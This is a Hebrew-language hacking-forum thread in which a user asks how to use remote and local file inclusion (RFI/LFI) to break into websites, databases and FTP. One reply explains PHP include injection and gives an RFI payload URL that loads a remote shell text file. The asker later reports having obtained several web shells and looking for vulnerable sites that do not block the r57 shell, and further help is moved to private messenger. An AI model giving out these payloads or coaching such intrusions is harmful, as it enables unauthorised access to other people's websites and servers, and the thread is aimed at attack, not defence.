קהילות פורומים, הורדות, יעוץ ותמיכה


אשכולות דומים

  1. Command & Conquer Generals Zero Hou|2 LINK
    על ידי T0Blerone בפורום משחקים להורדה
    תגובות: 8
    הודעה אחרונה: 29-10-2013, 19:46
  2. תגובות: 0
    הודעה אחרונה: 06-04-2011, 00:27
  3. [פרסום] לכל מי שבאמת רוצה ללמוד על shell\LFI\RFI
    על ידי xyossizx בפורום האקינג ואבטחת מידע
    תגובות: 9
    הודעה אחרונה: 13-09-2010, 21:27
  4. המטרה שלי בחיים...
    על ידי Moshe בפורום דיבורים
    תגובות: 34
    הודעה אחרונה: 05-10-2008, 03:46
  5. תגובות: 9
    הודעה אחרונה: 19-04-2006, 22:35
+ תגובה לנושא
מציג תוצאות 1 עד 7 מתוך 7

Rfi & Lfi & Shell Injection מה המטרה כאן בעצם?

  1. #1
    משתמש משקיע האוואטר של OverPowered
    שם פרטי
    ניק
    תאריך הצטרפות
    04/2010
    הודעות
    4,248
    לייקים
    691
    נקודות
    6
    משפט מחץ
    You know what your problem is... I'm too good looking
    מין: זכר

    Exclamation Rfi & Lfi & Shell Injection מה המטרה כאן בעצם?

    *אני לא מאמין שמישהו כאן יוכל לענות לי, אז רק מי שבאמת מבין שיכתוב אין לי זמן וכוח לבולשיט

    אז ככה,
    קראתי לעומק מאמרים על RFI וLFI וגם על SHELL .
    אני כרגע יותר מעוניין להבין מה בעצם המטרה של LFI וRFI
    קראתי ובדקתי על אתרים ולא הצלחתי להבין וגם לא הצלחתי לעשות שום דבר עם זה.
    הRFI הוא בעצם כלי על מנת לספק לי את הקובץ PHP ואת מה שכתוב בתוכו?
    כאילו את ה"קוד מקור" שלו?

    לא הבנתי בכלל מה המטרה של הפירצות האלו, ואיך אני אמור רלהשיג ולהכנס איתם למסדי נתונים ולקבצים ולFTP.

    אם אפשר הסבר קצר, ואולי אתר או שניים להתאמן עליהם.

    כרגע לפי מה שקראתי אפשר לנסות את הפירצות האלה רק על אתרים שיש בהם סיומת =page?
    כאילו
    www.test.com/index.html?page=13
    ואז אני מחדיר http://www.test.com/index.html?page=...m/login.php%00 כאן נתתי דוגמא לNULL שזה בעצם %00
    אבל קראתי והבנתי שיש עוד הרבה וזה רק ההתחלה

    בקיצור לא הבנתי בכלל על מה כל זה, ומה אני אמור להשיג מזה ואיך בעצם בדוגרי של הדוגרי לפרוץ בעזרת הכלים האלה.

    תודה לעוזרים!



  2. קישורים ממומנים

  3. #2
    מורחקים
    תאריך הצטרפות
    01/2011
    הודעות
    3,036
    לייקים
    2
    נקודות
    0
    משפט מחץ
    אם לא תעמוד על שלך , שלך לא יעמוד ;)
    מין: זכר

    ברירת מחדל

    ציטוט נכתב במקור על ידי Brod` צפיה בהודעה
    *אני לא מאמין שמישהו כאן יוכל לענות לי, אז רק מי שבאמת מבין שיכתוב אין לי זמן וכוח לבולשיט

    אז ככה,
    קראתי לעומק מאמרים על RFI וLFI וגם על SHELL .
    אני כרגע יותר מעוניין להבין מה בעצם המטרה של LFI וRFI
    קראתי ובדקתי על אתרים ולא הצלחתי להבין וגם לא הצלחתי לעשות שום דבר עם זה.
    הRFI הוא בעצם כלי על מנת לספק לי את הקובץ PHP ואת מה שכתוב בתוכו?
    כאילו את ה"קוד מקור" שלו?

    לא הבנתי בכלל מה המטרה של הפירצות האלו, ואיך אני אמור רלהשיג ולהכנס איתם למסדי נתונים ולקבצים ולFTP.

    אם אפשר הסבר קצר, ואולי אתר או שניים להתאמן עליהם.

    כרגע לפי מה שקראתי אפשר לנסות את הפירצות האלה רק על אתרים שיש בהם סיומת =page?
    כאילו
    www.test.com/index.html?page=13
    ואז אני מחדיר http://www.test.com/index.html?page=...m/login.php%00 כאן נתתי דוגמא לNULL שזה בעצם %00
    אבל קראתי והבנתי שיש עוד הרבה וזה רק ההתחלה

    בקיצור לא הבנתי בכלל על מה כל זה, ומה אני אמור להשיג מזה ואיך בעצם בדוגרי של הדוגרי לפרוץ בעזרת הכלים האלה.

    תודה לעוזרים!
    דווקא לא רק על אתרים שיש בהם =page
    קח:
    http://www.iatraf.co.il/showthread.php?t=704050

  4. #3
    משתמש מתחיל
    שם פרטי
    XxX
    תאריך הצטרפות
    01/2011
    הודעות
    160
    לייקים
    0
    נקודות
    50
    משפט מחץ
    pain is temporary glory is forever,never give up
    מין: זכר

    ברירת מחדל

    במילים אחרות ? אתה יכול לקרוא לזה Php Injection .
    מה שאתה בעצם עושה במתקפה זו הוא שאתה בעצם משתמש ב Include כאשר יש קובץ כלשהו.
    קוד:
    <?php include ("ne0.php");require ("ne0.php");?>
    הקובץ מיבא את הדף הנלקח ( Ne0.php).

    אוקיי עכשיו קח לדוגמא אתר שמייצג תוכנה כלשהי ,
    כמובן שבאתר הזה תמצא דף של הורדת התוכנה .
    לדוגמא :
    קוד PHP:
    Ne0-software.com/index.php?page=download.php 

    מה בעצם מתרחש בדף זה ?
    הקובץ
    DOWNLOAD.PHP
    מיובא בעצם , על ידי שימוש במשתנה Page.

    כאן בא החלק המעניין ,
    כעת , במקום שנכנס להורדה עצמה של התוכנה ( Ne0 Software )
    אנחנו נקרא קובץ משלנו - ברוב המקרים הקובץ יהיה זדוני ( בכל זאת אתה רוצה גישה למערכת )
    ( שאל ) .
    אז איך עושים זאת ?
    כך :
    קוד PHP:
    Ne0-software.com/index.php?page=www.shell.com/shell-number.txt 

    כאשר אתה מייצג את שם השאל ומספרו.
    ( השאל חייב להיות מיובא בקובץ TXT).


    מכאן , אני בטוח שתדע מה לעשות .

    דרך צלחה ידידי


    נערך לאחרונה על ידי ne0; 23-01-2011 בשעה 16:43.
    \ ´¯\).........(/¯`/
    \....\\............//..../
    \....\\Ne0//..../
    \´¯\....\´¯/...........\¯`/..../¯`/
    \.\...\....\....\.|_......_|./..../..../..././
    (.(....(....(....\.)..)..(..(./...)....)....).)
    /.............../\...\..../.../\...............\
    /.................\......../.................\


  5. #4
    משתמש מתחיל
    שם פרטי
    מייק
    תאריך הצטרפות
    01/2011
    גיל
    35
    הודעות
    60
    לייקים
    0
    נקודות
    0
    משפט מחץ
    שאלום קוראים לי מייק:)
    מין: זכר

    ברירת מחדל

    באמת גם אני לא הבנתי איך לעלות שאלל לדוגמה לפורום

  6. #5
    משתמש משקיע האוואטר של OverPowered
    שם פרטי
    ניק
    תאריך הצטרפות
    04/2010
    הודעות
    4,248
    לייקים
    691
    נקודות
    6
    משפט מחץ
    You know what your problem is... I'm too good looking
    מין: זכר

    ברירת מחדל

    Hackerxd אני פרסמתי את האשכול על ה׳sqli6 ואלה תחומים שונים לגמרי
    נאו מאוד עזרת לי, כרגע השגתי מספר שאאלים אבל הבעיה היחידה שלי היא שאני צריך לזהות אתרים פריצים שלא חסמו אתr57



  7. #6
    משתמש מתחיל
    שם פרטי
    XxX
    תאריך הצטרפות
    01/2011
    הודעות
    160
    לייקים
    0
    נקודות
    50
    משפט מחץ
    pain is temporary glory is forever,never give up
    מין: זכר

    ברירת מחדל

    ציטוט נכתב במקור על ידי Brod` צפיה בהודעה
    Hackerxd אני פרסמתי את האשכול על ה׳sqli6 ואלה תחומים שונים לגמרי
    נאו מאוד עזרת לי, כרגע השגתי מספר שאאלים אבל הבעיה היחידה שלי היא שאני צריך לזהות אתרים פריצים שלא חסמו אתr57
    במידה ויש לך מסנג'ר אשמח לעזור לך שם ,
    כמו שאתה מבין אני תמיד שמח לעזור לאנשים שעוזרים לעצמם
    \ ´¯\).........(/¯`/
    \....\\............//..../
    \....\\Ne0//..../
    \´¯\....\´¯/...........\¯`/..../¯`/
    \.\...\....\....\.|_......_|./..../..../..././
    (.(....(....(....\.)..)..(..(./...)....)....).)
    /.............../\...\..../.../\...............\
    /.................\......../.................\


  8. #7
    משתמש משקיע האוואטר של OverPowered
    שם פרטי
    ניק
    תאריך הצטרפות
    04/2010
    הודעות
    4,248
    לייקים
    691
    נקודות
    6
    משפט מחץ
    You know what your problem is... I'm too good looking
    מין: זכר

    ברירת מחדל

    אין שום בעיה, אני אצור איתך קשר במסנג'ר



+ תגובה לנושא


הרשאות פרסום

  • אין באפשרותך לפרסם נושאים חדשים
  • אין באפשרותך לפרסם תגובות
  • אין באפשרותך לצרף קבצים
  • אין באפשרותך לערוך את הודעותיך


כל הזמנים הם לפי GMT +3. השעה כרגע היא 19:06.
מופעל על ידי vBulletin™ © גרסה 4.1, 2011 vBulletin Solutions, Inc. כל הזכויות שמורות.
פעילות הגולשים
אומנות וגרפיקה
מוזיקה
ספורט
סדרות טלוויזיה
סרטים וקולנוע
קנייה ומכירה
רשתות חברתיות
הבורר 3
פורומי פנאי ובידור
סרטים
סדרות
משחקים
דיבורים
אקטואליה
בעלי חיים
בדיחות והומור
משחקי ספורט
הבורר
מחשבים וטכנולוגיה
תמיכה טכנית
חומרה ומודינג
תוכנות להורדה
סלולארי וגאדג'טים
רקעים למחשב
ציוד הקפי למחשב
אבטחת מידע
תכנות ובניית אתרים
כסף ברשת
אייפון
בריאות ואורח חיים
כושר ופיתוח גוף
דיאטה
צבא וגיוס
יעוץ מיני
מה שבלב
אומנות הפיתוי
יהדות
מיסטיקה ורוחניות
אתאיזם ודתות

נושאים: 2,473,852 | הודעות: 8,174,439 | משתמשים: 315,603 | המשתמש החדש ביותר: upizijoj | עיצוב גרפי: סטודיו עודד בביוף | קידוד: rellect